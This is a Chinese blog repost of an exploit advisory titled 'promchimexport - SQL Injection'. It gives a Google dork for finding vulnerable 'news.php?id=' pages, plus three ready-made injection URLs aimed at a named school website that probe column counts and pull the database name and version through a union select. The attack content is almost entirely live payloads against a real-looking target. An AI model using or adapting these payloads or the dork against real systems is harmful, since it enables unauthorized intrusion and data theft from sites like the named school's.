揭露SQL注入漏洞:promchimexport安全风险深度分析

本文披露了promchimexport应用中的一个SQL注入漏洞。文中详细提供了漏洞利用的具体步骤,包括通过构造恶意URL进行参数探测、数据库名和版本信息获取的技术细节,并附有用于发现此类漏洞的Google搜索语法。

Exploit Title: promchimexport - SQL Injection

Date: 12-23-2025

Exploit Author: javad rashidi

Tested on: Win,Linux

Google Dork: inurl:“news.php?id=”

https://paramekkavuvidyamandir.edu.in/news.php?id=129%27+order+by+8--+

https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,2,3,4,5,6,7,8--+

https://paramekkavuvidyamandir.edu.in/news.php?id=-129%27+union+select+1,database(),version(),4,5,6,7,8--+

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次